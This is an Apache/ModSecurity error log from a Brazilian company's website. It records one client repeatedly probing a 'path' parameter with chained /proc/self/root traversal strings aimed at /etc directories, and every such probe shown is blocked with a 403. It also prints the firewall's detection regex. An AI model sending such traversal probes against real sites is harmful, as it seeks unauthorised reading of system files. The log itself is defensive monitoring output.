[Tue Mar 17 20:54:42.015475 2026] [:error] [pid 11088:tid 140411574073088] [client 74.7.241.31:56624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpwmmqtCojLHvu5cKPpgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:43.523630 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:56640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpw8df6f5d65gmYZRjNwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:54:44.961516 2026] [:error] [pid 11088:tid 140411658000128] [client 74.7.241.31:56652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpxGmqtCojLHvu5cKPpwAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:46.401321 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:56658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpxnIk7brgkOH-rIWzJgAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:47.847967 2026] [:error] [pid 11088:tid 140411590858496] [client 74.7.241.31:35572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpx2mqtCojLHvu5cKPqQAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:54:49.257906 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.241.31:35584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpyRj0p0SRWAqcjGGggwAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:59.819831 2026] [:error] [pid 25836:tid 140411674785536] [client 74.7.241.31:38222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp04h-PF_25v4hFRCRiQAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:01.580131 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:38238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp1Yh-PF_25v4hFRCRigAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:55:01.779746 2026] [:error] [pid 25836:tid 140411691570944] [client 74.7.241.31:38238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp1Yh-PF_25v4hFRCRiwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:55:02.209964 2026] [proxy_fcgi:error] [pid 25836:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46354] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:55:04.259223 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:38246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp2Ih-PF_25v4hFRCRjgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:05.851350 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:38256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp2eyqAr6etmhZHNpNfwAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:07.225677 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:38260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp29Y0UrI5A3LftIwmJQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:09.039010 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.241.31:53932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp3Yh-PF_25v4hFRCRkAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:10.467465 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:53934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp3uw_le52K8_3pV1zdAAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:24.125795 2026] [proxy_fcgi:error] [pid 6296:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46722] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:55:25.460411 2026] [:error] [pid 29151:tid 140411565680384] [client 74.7.241.31:40224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp7fPqhzTj3BvfDX-vhAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:26.905429 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:40228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp7uyqAr6etmhZHNpNhgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:29.596237 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.241.31:52632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp8Yh-PF_25v4hFRCRmgAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:55:31.277353 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:52640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp8xj0p0SRWAqcjGGgkQAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:55:32.871381 2026] [:error] [pid 25836:tid 140411683178240] [client 74.7.241.31:52650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnp9Ih-PF_25v4hFRCRnQAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:55:46.134281 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47158] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:55:47.502978 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:59316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqA8df6f5d65gmYZRjSAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:55:49.772087 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.241.31:59318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqBPPqhzTj3BvfDX-viwAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:55:51.863384 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:59330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqBxj0p0SRWAqcjGGglwAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
